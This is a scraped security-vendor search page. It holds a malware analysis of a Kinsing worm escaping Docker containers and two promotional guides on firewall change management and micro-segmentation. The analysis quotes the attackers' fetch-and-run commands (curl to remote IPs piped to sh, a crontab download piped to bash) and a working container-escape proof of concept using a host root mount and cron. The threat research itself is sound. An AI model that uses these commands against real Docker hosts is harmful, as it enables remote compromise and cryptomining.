top of page

Search results

696 results found with an empty search

  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • Firewall rule automation & change management explained | AlgoSec

    Learn about firewall rule automation and change management to streamline processes, reduce human error, and enhance network security with effective change controls. Firewall rule automation & change management explained Overview In today’s IT environment, the only constant is change. Not only is change rampant, but it often occurs at breakneck speed. Rapid business growth from mergers and acquisitions, development of new and de-commissioning of old applications, new users, micro-segmentation, cloud migrations and more make for a dynamic environment that poses new security challenges all the time. Schedule a Demo Introduction In today’s IT environment, the only constant is change. Not only is change rampant, but it often occurs at breakneck speed. For a variety of reasons – rapid business growth from mergers and acquisitions, development of new applications, de-commissioning of old applications, new users, evolving networks and evolving cyberthreats – business needs change and, as they do, so must security policies. But change comes with challenges, often leading to major headaches for IT operations and security teams. The headaches sometimes develop into huge business problems: Manual workflows and change management processes are time-consuming and impede IT from keeping up with the necessary business agility Improper management of even minor changes can lead to serious business risks as benign as blockage of legitimate traffic all the way to putting the entire network offline Some organizations have grown so wary of change control and its potential negative impact that they resort to network freezes during peak business times rather than attempt to implement an urgent change in their network security policies. AlgoSec has another point of view. We want to help you embrace change through process improvement, identifying areas where automation and actionable intelligence can simultaneously enhance security and business agility – without the headaches. Herein, you will learn the secrets of how to elevate your firewall change management from manual labor-intensive work to a fully automated change management process. Schedule a Demo Why is it so hard to make changes to network policies? Placing a sticky note on your firewall administrator’s desk and expecting the change request to be performed pronto does not constitute a formal policy. Yet, shockingly, this is common practice. A formal change request process is in order. Such a process dictates clearly defined and documented steps for how a change request is to be handled, by whom, how it is addressed within a specified SLA, and more. Using IT ticketing systems Popular IT ticketing systems, like ServiceNow and Remedy, are a good place to manage your firewall change requests. However, these system are built for tracking general requests and were never designed for handling complex requests such as opening the network flow from server A to server B or revising user groups. Informal change processes Having a policy state “this is what we must do” is a start, but without a formal set of steps for carrying out and enforcing that policy, you still have a long way to go in terms of smoothing out your change processes. In fact, the majority of challenges for managing network security devices include: Time-consuming manual processes Poor change-management processes Error-prone processes Firewall change management requires detailed and concise steps that everyone understands and follows. Exceptions must be approved and documented, continuously improving the process over time. Communication breakdown Network security and operations staff work in separate silos. Their goals, and even their languages, are different. Working in silos is a clear recipe for trouble. It is a major contributor to out-of-band (unexpected) changes which are notorious for resulting in “out-of-service.” In many large companies, routine IT operational and administrative tasks may be handled by a team other than the one that handles security and risk-related tasks. Although both teams work toward the same goal – smooth operation of the digital side of the business – decisions and actions made by one team may lead to problems for the other. Sometimes, these situations are alleviated in a rush with the good intention of dealing with security issues “later.” But this crucial “later” never arrives and the network remains open to breaches. In fact, according to a large-scale survey of our own customers, out-of-process firewall changes resulted in system outages for a majority of them. In addition, our customers pointed out that out-of-process changes have caused them exposure to data breaches and costly audit failures. How will you know if it’s broken? It’s imperative to know what the business is up against from the perspective of threats and vulnerabilities. What’s often overlooked, however, is the no-less-devastating impact of poorly managed firewall changes. Without carefully analyzing how even the most minor firewall changes are going to impact the network environment, businesses can suffer dramatic problems. Without thoughtful analysis, they might not know: What does the change do to vital visibility across the network? Which applications and connections are broken by this change? Which new security vulnerabilities are introduced? How will performance be affected? A lot of money and effort is put into keeping the bad guys out, while forgetting that “we have seen the enemy and he is us.” Network complexity is a security killer Renowned security expert, Bruce Schneier, has stated, “Complexity is the worst enemy of security.” The sheer complexity of any given network can lead to a lot of mistakes, especially when it comes to multiple firewalls with complex rule sets. Simplifying the firewall environment and management processes is necessary for good management. Did you know? Up to 30 percent of implemented rule changes in large firewall infrastructures are unnecessary because the firewalls are already allowing the requested traffic! Under time pressure, firewall administrators often create more rules which turn out to be redundant given already-existing rules. This wastes valuable time and makes the firewalls even harder to manage. Schedule a Demo Mind the gap? Not if you want a good change management process The introduction of new things opens up security gaps. New hires, software patches, upgrades and network updates all increase risk exposure. The situation is further complicated in larger organizations which may have a mixed security estate comprising traditional, next-generation and virtualized firewalls from multiple vendors across clouds and on-premise data centers, all with hundreds of policies and thousands of rules. Who can keep track of it all? What about unexpected, quick-fixes that enable access to certain resources or capabilities? In many cases, a fix is made in a rush (after all, who wants a C-level exec breathing down their neck because he wants to access the network from his new tablet RIGHT NOW?) without sufficient consideration of whether that change is allowable under current security policies, or if it introduces new exposures. Sure, you can’t predict when users will make change requests, but you can certainly prepare the process for handling these requests whenever they arise. Bringing both IT operations and security teams together to prepare game plans for these situations – and for other ‘knowns’ such as network upgrades, change freezes, and audits – helps to minimize the risk of security gaps. What’s more, there are solutions that automate day-to-day firewall management tasks and link these changes and procedures so that they are recorded as part of the change management plan. In fact, automated technologies can help bridge the gap between change management processes and what’s really taking place. They enhance accuracy, by removing people from the equation to a very large degree. For example, a sophisticated firewall and topology-aware workflow system that is able to identify redundant and unneeded change requests can increase the productivity of the IT staff. IT operations and security groups are ultimately responsible for making sure that systems are functioning properly so that business goals are continuously met. However, these teams approach business continuity from different perspectives. The security department’s number one goal is to protect the business and its data whereas the IT operations team is focused on keeping systems up and running. It is natural for these two teams to clash. However, oftentimes, IT operations and security teams align their perspectives because both have a crucial ownership stake. The business has to keep running AND it has to be secure. But this kind of alignment of interests is easier said than done. To achieve the alignment, organizations must re- examine current IT and security processes. Let’s have a look at some examples of what happens when alignment is not performed. Schedule a Demo Real-life examples of good changes gone bad Example 1 A classic lack of communication between the IT operations and security groups put XYZ Corporation at risk. An IT department administrator, who was trying to be helpful, took the initiative to set up (on his own, with no security involvement or documentation) an FTP share for a user who needed to upload files in a hurry. By making this off-the-cuff change, the IT admin quickly addressed the client’s request and the files were uploaded. However, the FTP account lingered unsecured well beyond its effective “use by” date. By the next day, the security team noticed larger spikes of inbound traffic to the server from this very FTP account. Hackers abound. The FTP site had been compromised and was being exploited to host pirated movies. Example 2 A core provider of e-commerce services to businesses in the U.S. suffered a horrible fate due to a simple, but poorly managed, firewall change. One day, all e-commerce transactions in and out of its network ceased and the entire business was taken offline for several hours. The costs were astronomical. What happened? An out-of-band (and untested) change to a core firewall broke the communication between the e-commerce application and the internet. Business activity ground to a halt. Executive management got involved and the responsible IT staff members were reprimanded. Hundreds of thousands of dollars later, the root cause of the outage was uncovered: IT staff, oblivious to the consequences, chose not to test their firewall changes, bypassing their “burdensome” ITIL-based change management procedures. Tips from your own peers Taken from The Big Collection of Firewall Management Tips Document, document, document … And when in doubt, document some more! “It is especially critical for people to document the rules they add or change so that other administrators know the purpose of each rule and whom to contact about it. Good documentation can make troubleshooting easy. It reduces the risk of service disruptions that inadvertently occur when an administrator deletes or changes a rule they do not understand.” – Todd, InfoSec Architect, United States “Keep a historical change log of your firewall policy so you can return to safe harbor in case something goes wrong. A proper change log should include the reason for the change, the requester and approval records.” – Pedro Cunha, Engineer, Oni, Portugal Schedule a Demo Taking the fire drill out of firewall changes Automation is the key. It helps staff disengage from firefighting and bouncing reactively between incidents. It helps them gain control. The right automation solution can help teams track down potential traffic or connectivity issues and highlight areas of risk. Administrators can get a handle on the current status of policy compliance across mixed estates of traditional, next-generation and virtualized firewalls as well as hybrid on-prem and cloud estates. The solution can also automatically pinpoint the devices that may require changes and show how to create and implement those changes in the most secure way. Automation not only makes firewall change management easier and more predictable across large estates and multiple teams, but also frees staff to handle more strategic security and compliance tasks. Let the solution handle the heavy lifting and free up the staff for other things. To ensure a proper balance between business continuity and security, look for a firewall policy management solution that: Measures every step of the change workflow so you can easily demonstrate that SLAs are being met Identifies potential bottlenecks and risks BEFORE changes are made Pinpoints change requests that require special attention Tips from your peers Taken from The Big Collection of Firewall Management Tips “Perform reconciliation between change requests and actual performed changes. Looking at the unaccounted changes will always surprise you. Ensuring every change is accounted for will greatly simplify your next audit and help in day-to-day troubleshooting.” – Ron, Manager, Australia “Have a workflow process for implementing a security rule from the user requesting change, through the approval process and implementation.” – Gordy, Senior Network Engineer, United States Schedule a Demo 10 steps to automating and standardizing the firewall change-management process Here is the secret to getting network security policy change management right. Once a request is made, a change-request process should include the following steps: Clarify the change request and determine the dependencies. Obtain all relevant information in the change request form (i.e., who is requesting the change and why). Get proper authorization for the change, matching it to specific devices and prioritizing it. Make sure you understand the dependencies and the impact on business applications, other devices and systems, etc. This usually involves multiple stakeholders from different teams. Validate that the change is necessary. AlgoSec research has found that up to 30% of changes are unnecessary. Weeding out redundant work can significantly improve IT operations and business agility. Perform a risk assessment. Before approving the change, thoroughly test it and analyze the results so as not to unintentionally open up the proverbial can of worms. Does the proposed change create a new risk in the security policy? You need to know this for certain BEFORE making the change. Plan the change. Assign resources, create and test your back-out plans, and schedule the change. Part of a good change plan involves having a backup plan in case a change goes unexpectedly wrong. This is also a good place in the process to ensure that everything is properly documented for troubleshooting or recertification purposes. Execute the change. Backup existing configurations, prepare target device(s) and notify appropriate workgroups of any planned outage and perform the actual change. Verify correct execution to avoid outages. Test the change, including affected systems and network traffic patterns. Audit and govern the change process. Review the executed change and any lessons learned. Having a non-operations-related group conduct the audit provides the necessary separation of duties and ensures a documented audit trail for every change. Measure SLAs. Establish new performance metrics and obtain a baseline measurement. Recertify policies. While not necessary for every rule change, part of your change management process should include a review and recertification of policies at an interval that you define (e.g., once a year). Oftentimes, rules are temporary – needed only for a certain period of time – but they are left in place beyond their active date. This step forces you to review why policies are in place, enabling you to improve documentation and to remove or tweak rules to align with the business. In some cases (e.g., data breach) a change to a firewall rule set must be made immediately, where, even with all the automation in the world, there is no time to go through the 10 steps. To address this type of situation, an emergency process should be defined and documented. Schedule a Demo Key capabiities to look for in a firewall change management solution Your workflow system must be firewall- and network-aware. This allows the system to gather the proper intelligence by pulling the configuration information from the firewalls to understand the current policies. Ultimately, this reduces the time it takes to complete many of the steps within the change process. In contrast, a general change management system will not have this integration and thus will provide no domain-specific expertise when it comes to making firewall rule changes. Your solution must support all of the firewalls and routers used within your organization. With the evolution of next-generation firewalls and new cloud devices, you should also consider how your plans fit into your firewall change-management decisions. In larger organizations, there are typically many firewalls from different vendors. If your solution cannot support all the devices in the environment (current and future), then this isn’t the solution for you! Your solution must be topology-aware. The solution must:Understand how the network is laid out Comprehend how the devices fit and interact Provide the necessary visibility of how traffic is flowing through the network Your solution must integrate with the existing general change management systems. This is important so that you can maximize the return on previously made investments. You don’t want to undergo a massive retraining on processes and systems simply because you have introduced a new solution. This integration allows users to continue using their familiar systems, but with the added intelligence from having that firewall-aware visibility and understanding that the new solution delivers. Your solution must provide out-of-the-box change workflows to streamline change-management processes as well as be highly customizable since no two organizations’ network and change processes are exactly the same. Key workflow capabilities to look for in a solution:Provide out-of-the-box change workflows to help you quickly tackle common change-request scenarios Offer the ability to tailor the change process to your unique business needs by: Creating request templates that define the information required to start a change process and pre-populate information where possible Enabling parallel approval steps within the workflow — ideal when multiple approvals are required to process a change Influencing the workflow according to dynamic information obtained during ticket processing (e.g., risk level, affected firewalls, urgency, ) Ensuring accountability and increasing corporate governance with logic that routes change requests to specific roles throughout the workflow Identify which firewalls and rules block requested traffic Detect and filter unneeded/redundant requests for traffic that is already permitted Provide “what-if” risk-analysis to ensure compliance with regulations and policies Automatically produce detailed work orders, indicating which new or existing rules to add or edit and which objects to create or reuse Prevent unauthorized changes by automatically matching detected policy changes with request tickets and reporting on mismatches Ensure that change requests have actually been implemented on the network, preventing premature closing of tickets Schedule a Demo Out-of-the-box workflow examples The best solutions allow for: Adding new rules via a wizard-driven request process and flow that includes impact analysis, change validation and audit Changing rules and objects by easily defining the requests for creation, modification and deletion, and identifying rules affected by suggested object modifications for best impact analysis Removing rules by automatically retrieving a list of change requests related to the rule-removal request, notifying all requestors of the impending change, managing the approval process, documenting and validating removal Recertifying rules by automatically presenting all tickets with deadlines to the responsible party for recertification or rejection and maintaining a full audit trail with actionable reporting Quantifying the ROI on firewall change-control automation Schedule a Demo Cut your costs Manual firewall change management is a time-consuming and error-prone process. Consider a typical change order that requires a total of four hours of work by several team members during the change lifecycle, including communication, validation, risk assessment, planning and design, execution, verification, documentation, auditing and measurement. Based on these assumptions, AlgoSec customers have reported significant cost savings (as much as 60%) achieved through: Reduction of 50% in processing time using automation Elimination of 30% of unnecessary changes Elimination of 8% of changes that are reopened due to incorrect implementation Schedule a Demo Summary While change management is complex stuff, the decision for your business is actually simple. You can continue to slowly chug along with manual change management processes that drain your IT resources and impede agility. Or you can accelerate your processes with an automated network change- management workflow solution that aligns the different stakeholders involved in the process (network operations, network security, compliance, business owners, etc.) and helps the business run more smoothly. Think of your change process as a key component of the engine of an expensive car (in this case, your organization). Would you drive your car at high speed if you didn’t have tested, dependable brakes or a steering wheel? Hopefully, the answer is no! The brakes and steering wheel are analogous to change controls and processes. Rather than slowing you down, they actually make you go faster, securely! Power steering and power brakes (in this case, firewall-aware integration and automation) help you zoom to success. Let's start your journey to our business-centric network Schedule a Demo Select a size Overview Introduction Why is it so hard to make changes to network policies? Mind the gap? Not if you want a good change management process Real-life examples of good changes gone bad Taking the fire drill out of firewall changes 10 steps to automating and standardizing the firewall change-management process Key capabiities to look for in a firewall change management solution Out-of-the-box workflow examples Cut your costs Summary Get the latest insights from the experts Choose a better way to manage your network

  • Micro-segmentation from strategy to execution | AlgoSec

    Implement micro-segmentation effectively, from strategy to execution, to enhance security, minimize risks, and protect critical assets across your network. Micro-segmentation from strategy to execution Overview Learn how to plan and execute your micro-segmentation project in AlgoSec’s guide. Schedule a Demo What is Micro segmentation Micro-segmentation is a technique to create secure zones in networks. It lets companies isolate workloads from one another and introduce tight controls over internal access to sensitive data. This makes network security more granular. Micro-segmentation is an “upgrade” to network segmentation. Companies have long relied on firewalls, VLANs, and access control lists (ACL) to segment their network. Network segmentation is a key defense-in-depth strategy, segregating and protecting company data and limiting attackers’ lateral movements. Consider a physical intruder who enters a gated community. Despite having breached the gate, the intruder cannot freely enter the houses in the community because, in addition to the outside gate, each house has locks on its door. Micro-segmentation takes this an additional step further – even if the intruder breaks into a house, the intruder cannot access all the rooms. Schedule a Demo Why Micro-segment? Organizations frequently implement micro-segmentation to block lateral movement. Two common types of lateral movements are insider threats and ransomware. Insider threats are employees or contractors gaining access to data that they are not authorized to access. Ransomware is a type of malware attack in which the attacker locks and encrypts the victim’s data and then demands a payment to unlock and decrypt the data. If an attacker takes over one desktop or one server in your estate and deploys malware, you want to reduce the “blast radius” and make sure that the malware can’t spread throughout the entire data center. And if you decide not to pay the ransom? Datto’s Global State of the Channel Ransomware Report informs us that: The cost of downtime is 23x greater than the average ransom requested in 2019. Downtime costs due to ransomware are up by 200% year-over-year. Schedule a Demo The SDN Solution With software-defined networks, such as Cisco ACI and VMware NSX, micro-segmentation can be achieved without deploying additional controls such as firewalls. Because the data center is software-driven, the fabric has built-in filtering capabilities. This means that you can introduce policy rules without adding new hardware. SDN solutions can filter flows both inside the data center (east-west traffic) and flows entering or exiting the data center (north-south traffic). The SDN technology supporting your data center eliminates many of the earlier barriers to micro-segmentation. Yet, although a software-defined fabric makes segmentation possible, there are still many challenges to making it a reality. Schedule a Demo What is a Good Filtering Policy A good filtering policy has three requirements: 1 – Allows all business traffic The last thing you want is to write a micro-segmented policy and have it break necessary business communication, causing applications to stop functioning. 2 – Allows nothing else By default, all other traffic should be denied. 3 – Future-proof “More of the same” changes in the network environment shouldn’t break rules. If you write your policies too narrowly, then any change in the network, such as a new server or application, could cause something to stop working. Write with scalability in mind. How do organizations achieve these requirements? They need to know what the traffic flows are as well as what should be allowed and what should be denied. This is difficult because most traffic is undocumented. There is no clear record of the applications in the data center and what network flows they depend on. To get accurate information, you need to perform a “discovery” process. Schedule a Demo A Blueprint for Creating a Micro-segmentation Policy Micro-segmentation Blueprint Discovery You need to find out which traffic needs to be allowed and then you can decide what not to allow. Two common ways to implement a discovery process are traffic-based discovery and content-based discovery. Traffic-Based Discovery Traffic-based discovery is the process of understanding traffic flows: Observe the traffic that is traversing the data center, analyze it, and identify the intent of the flows by mapping them to the applications they support. You can collect the raw traffic with a traffic sniffer/network TAP or use a NetFlow feed. Content-based or Data-Based Approach In the content-based approach, you organize the data center systems into segments based on the sensitivity of the data they process. For example, an eCommerce application may process credit card information which is regulated by the PCI DSS standard. Therefore, you need to identify the servers supporting the eCommerce application and separate them in your filtering policy. Discovering traffic flows within a data center Micro-segmentation Blueprint Using NetFlow for Traffic Mapping The traffic source on which it is easiest to base application discovery is NetFlow. Most routers and switches can be configured to emit a NetFlow feed without requiring the deployment of agents throughout the data center. The flows in the NetFlow feed are clustered into business applications based on recurring IP addresses and correlations in time. For example, if an HTTPS connection from a client at 172.7.1.11 to 10.3.3.3 is observed at 10 AM, and a PostgreSQL connection from the same 10.3.3.3 to 10.1.1.1 is observed 0.5 seconds later, it’s clear that all three systems support a single application, which can be labeled with a name such as “Trading System”. 172.7.1.0/2410.3.3.3 TRADE SYS HTTPS10.3.3.3 TRADE SYS 10.1.1.11 DB TCP/543210.3.3.7 FOREX 10.1.1.11 DB TCP/5432 Identifying traffic flows in common, based on shared IP addresses NetFlow often produces thousands of “thin flow” records (one IP to another IP), even for a single application. In the example above, there may be a NetFlow record for every client desktop. It is important to aggregate them into “fat flows” (e.g., that allows all the clients in the 172.7.1.0/24 range). In addition to avoiding an explosion in the number of flows, aggregation also provides a higher-level understanding, as well as future-proofing the policies against fluctuations in IP address allocation. Using the discovery platform in the AlgoSec Security Management Suite to identify the flows in combination with information from your firewalls can help you decide where to put the boundaries of your segments and which policies to put in these filters. Micro-segmentation Blueprint Defining Logical Segments Once you have discovered the business applications whose traffic is traversing the data center (using traffic-based discovery) and have also identified the data sensitivity (using a content-based approach) you are well positioned to define your segments. Bear in mind that all the traffic that is confined to a segment is allowed. Traffic crossing between segments is blocked by default – and needs to be explicitly allowed by a policy rule. There are two potential starting points: Segregate the systems processing sensitive data into their own segments. You may have to do this anyway for regulatory reasons. Segregate networks connecting to client systems (desktops, laptops, wireless networks) into “human-zone” segments. Client systems are often the entry points of malware, and are always the source of malicious insider attacks. Then, place the remaining servers supporting each application, each in its own segment. Doing so will save you the need to write explicit policy rules to allow traffic that is internal to only one business application. Example segment within a data center Micro-segmentation Blueprint Creating the Filtering Policy Once the segments are defined, we need to write the policy. Traffic confined to a segment is automatically allowed so we don’t need to worry about it anymore. We just need to write policy for traffic crossing micro-segment boundaries. Eventually, the last rule on the policy must be a default-deny: “from anywhere to anywhere, with any service – DENY.” However, enforcing such a rule in the early days of the micro-segmentation project, before all the rest of the policy is written, risks breaking many applications’ communications. So start with a (totally insecure) default-allow rule until your policy is ready, and then switch to a default-deny on “D-Day” (“deny-day”). We’ll discuss D-Day shortly. What types of rules are we going to be writing? Cross segment flows – Allowing traffic between segments: e.g., Allow the eCommerce servers to access the credit-card Flows to/from outside the data center – e.g., allow employees in the finance department to connect to financial data within the data center from their machines in the human-zone, or allow access from the Internet to the front-end eCommerce web servers. Users outside the data center need to access data within the data center Micro-segmentation Blueprint Default Allow – with Logging To avoid major connectivity disruptions, start your micro-segmentation project gently. Instead of writing a “DENY” rule at the end of the policy, write an “ALLOW” rule – which is clearly insecure – but turn on logging for this ALLOW rule. This creates a log of all connections that match the default-allow rule. Initially you will receive many logs entries from the default-allow rule; your goal in the project is to eliminate them. To do this, you go over the applications you discovered earlier, write the policy rules that support each application’s cross-segment flows, and place them above the default-allow rule. This means that the traffic of each application you handle will no longer match the default-allow (it will match the new rules you wrote) – and the amount of default-allow logs will decrease. Keep adding rules, application by application, until the final allow rule is not generating any more logs. At that point, you reach the final milestone in the project: D-Day. Micro-segmentation Blueprint Preparing for “D-Day” Once logging generated by the default-allow rule ceases to indicate new flows that need to be added to your filtering policy, you can start preparing for “D-Day.” This is the day that you flip the switch and change the final rule from “default ALLOW” to “default DENY.” Once you do that, all the undiscovered traffic is going to be denied by the filtering fabric, and you will finally have a secured, micro-segmented, data center. This is a big deal! However, you should realize that D-Day is going to cause a big organizational change. From this day forward, every application developer whose application requires new traffic to cross the data center will need to ask for permission to allow this traffic; they will need to follow a process, which includes opening a change request, and then wait for the change to be implemented. The free-wheeling days are over. You need to prepare for D-Day. Consider steps such as: Get management buy-in Communicate the change across the organization Set a change control window Have “all hands on deck” on D-Day to quickly correct anything that may have been missed and causes applications to break Micro-segmentation Blueprint Change Requests & Compliance Notice that after D-Day, any change in application connectivity requires filing a “change request”. When the information security team is evaluating a change request – they need to check whether the request is in line with the “acceptable traffic” policy. A common method for managing policy at the high-level is to use a table, where each row represents a segment, and every column represents a segment. Each cell in the table lists all the services that are allowed from its “row” segment to its “column” segment. Keeping this table in a machine readable format, such an Excel spreadsheet, enables software systems to run a what-if risk-check that compares each change-request with the acceptable policy, and flags any discrepancies before the new rules are deployed. Such a what-if risk-check is also important for regulatory compliance. Regulations such as PCI and ISO27001 require organizations to define such a policy, and to compare themselves to it; demonstrating the policy is often part of the certification or audit. Schedule a Demo Enabling Micro-segmentation with AlgoSec The AlgoSec Security Management Suite (ASMS) makes it easy to define and enforce your micro-segmentation strategy inside the data center, ensuring that it does not block critical business services and does meet compliance requirements. AlgoSec’s powerful AutoDiscovery capabilities help you understand the network flows in your organization. You can automatically connect the recognized traffic flows to the business applications that use them. Once the segments are established, AlgoSec seamlessly manages the network security policy across your entire hybrid network estate. AlgoSec proactively checks every proposed firewall rule change request against the segmentation strategy to ensure that the change doesn’t break the segmentation strategy, introduce risk, or violate compliance requirements. AlgoSec enforces micro-segmentation by: Generating a custom report on compliance enforced by the micro-segmentation policy Identifying unprotected network flows that do not cross any firewall and are not filtered for an application Automatically identifying changes that violate the micro-segmentation strategy Automatically implementing network security changes Automatically validating changes Security zones in AlgoSec’s AppViz Want to learn more? Get a personal demo Schedule a Demo About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere.  The AlgoSec platform enables the world’s most complex organizations to gain visibility, 